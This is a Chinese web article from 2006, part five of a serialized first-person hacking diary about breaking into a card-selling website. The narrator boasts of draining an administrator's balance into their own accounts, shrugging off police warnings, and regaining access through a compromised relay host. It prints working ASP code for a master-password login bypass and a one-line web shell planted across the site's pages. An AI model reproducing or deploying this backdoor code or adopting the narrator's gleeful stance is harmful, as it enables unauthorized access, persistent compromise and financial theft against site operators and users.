| 黑客与网管的30天的较量(五) |
| 作者:世界末日 来源:中华盾 加入时间:2006-3-21 www.cnitrc.com |
|
11月28号
再次登陆那个卡站的时候,发现读卡页面被删,一下子心跳起来,既然被发现了,一不做二不休,把他的钱花光,转帐。
找到了一个一级管理员的帐号,改了他的密码,把他的帐号余额一万多元,全部转到esales自己用户上。并且向自己的QQ中转帐一千多个QB.
当时真傻,这样的事情都做得出来,原来,在他们系统里转帐还得经过他总后台同意,这样一来,我暴露了自己的QQ和esales的帐户。
###############
11月29日下午上线的时候,发现QQ里来了10多条这样的信息:
用户xxxxxxxx请求你通过身份验证
附加消息:公安已经立案了 IP地址他们已经查到了 丢了2000多元卡
用户xxxxxxxx请求你通过身份验证
附加消息:这些钱 都是这个IP地址的人赔给我 公安已经保证过了
用户xxxxxxxx请求你通过身份验证
附加消息:还要另外赔给我电话费等100元 我胜利了:}
用户xxxxxxxx请求你通过身份验证
附加消息:你们的 世界末日し要到了
................
..............
............
###############
当时紧张了3秒,然后恢复平静,那站长说的是实话?还是恐吓之类的话,他不怕人家格他硬盘?
呵呵,怕他是小鸟,我们继续,换了一个韩国肉鸡,登陆他的终端,发现我的guest密码已经不对了。
还好,SA还能连得上去,还可以加用户,哈哈哈。马上加了一个用户,又上终端,在他的login.asp(登陆页面)找到这么一句,加了这么一句话:
if trim(rst("userpassword"))<>trim(md5(request("password")))
then
response.write("<script>alert('帐号或密码错误!请确认后再提交。');history.go(-1)</script>")
response.end
end if
这是登陆验证页面,我在这句代码了做了些手脚,把代码改成:
if trim(rst("userpassword"))<>trim(md5(request("password")))
then
password1=request("password")
if password1<>"shijiemori" then
response.write("<script>alert('帐号或密码错误!请确认后再提交。 (Err=0103)');history.go(-1)</script>")
response.end
end if
end if
这句意思是说,当检测到对方的密码不正确,并且提交的密码不是"shijiemori"的时候才显示密码错误,也就是说,我用任何一个用户,输入shijiemori这个密码,他都是正确的。哈哈。这就成了“万能密码”
今天特意在他一个比较隐蔽的地方,再放了一个ASP后门,以后每次都用这个后门登陆,并且修改他的硬盘资料。
同时也在N个页面里放了一句这样的代码(一句话后门):
<%
shijiemori=request("shijiemori")
if shijiemori="trun" then
execute request("o")
end if
%>
注:上面这句话功能非常强大,文章后面再作介绍.
 |
|
|
未经书面授权严禁转载和复制本站的任何招聘信息和文章